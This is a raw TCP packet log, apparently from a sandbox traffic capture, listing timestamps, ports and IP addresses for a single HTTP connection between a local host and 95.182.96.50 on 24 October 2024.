Oct 24, 2024 13:54:22.918190956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918195963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.918220043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918251991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918257952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.918287039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918294907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.918323994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918363094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.957263947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.957315922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.957346916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.957355976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.957371950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.957420111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026330948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026396990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026405096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026464939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026468992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026504993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026551962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026598930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026603937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026647091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026654005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026701927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026710987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026746988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026781082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026796103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026817083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026823044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026880980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026926041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.026933908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026993990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.026998043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027029037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027066946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027081013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027097940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027120113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027141094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027143002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027175903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027211905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027221918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027247906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027282953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027295113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027339935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027374029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027388096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027409077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027416945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027441025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027481079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027493000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027534962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027580976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027587891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027631998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027641058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027684927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027698040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027739048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027750969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027784109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027796984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027820110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027823925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027856112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027894020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027899981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027935028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.027945042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.027990103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028002024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028045893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028053999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028090000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028116941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028122902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028136015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028160095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028167963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028193951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028203011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028238058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028248072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028295994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028305054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028362989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028387070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028398991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028413057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028458118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028465033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028500080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028508902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028536081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028542995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028572083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028618097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028624058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028676987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028718948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028733969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028768063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028803110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028815985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028842926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028878927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028886080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028911114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028920889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.028944969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028980970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.028990030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029014111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029023886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029047966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029058933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029083014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029088974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029119015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029128075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029154062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029160976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029190063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029196024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029225111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029232025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029261112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029267073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029294968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029304028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029329062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029352903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029366016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029386044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029418945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029434919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029465914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029480934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029511929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029520035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029562950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029573917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029608965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029664040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029669046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029709101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029709101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029721975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029757023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029788971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029808998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029827118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029829025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029869080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029880047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029915094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029932976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029964924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.029995918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.029998064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030016899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030025959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030029058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030081987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030127048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030133963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030178070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030188084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030222893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030231953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030261993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030261993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030316114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030348063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030361891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030389071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030399084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030438900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030471087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030473948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030488968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030508041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030541897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030548096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030576944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030580997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030611992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030618906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030652046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030667067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030703068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030721903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030755997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030797958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030813932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030864000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030865908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030900955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030908108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030930996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030963898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.030973911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.030997992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031007051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031033993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031066895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031078100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031101942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031121969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031167984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031177998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031212091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031255007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031265020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031300068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031306028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031372070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031375885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031410933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031507015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031527042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031579018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031598091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031615973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031619072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031646967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031656027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031680107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031699896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031734943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031740904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031774998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031789064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031831980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031846046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031882048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031915903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031920910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.031966925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.031977892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032002926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032006025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032041073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032052040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032077074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032082081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032129049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032133102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032166004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032171965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032201052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032207012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032243967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032278061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032280922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032289028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032314062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032329082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032347918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032357931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032383919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032411098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032418013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032424927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032454967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032469988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032490969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032499075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032526970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032532930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032562971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032572985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032597065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032617092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032628059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032639027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032663107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032670021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032700062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032704115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032733917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032768965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032780886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032802105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032818079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032840967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032875061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032883883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032910109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032915115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.032944918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032979965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.032984018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033014059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033050060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033060074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033083916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033090115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033106089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033122063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033144951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033145905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033163071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033169985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033179998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033194065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033195019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033210039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033210993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033225060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033231020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033238888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033247948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033256054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033265114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033272982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033281088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033293009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033298016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033299923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033315897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033318996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033333063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033334017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033346891 CEST	49714	80	192.168.2.6	95.182.96.50
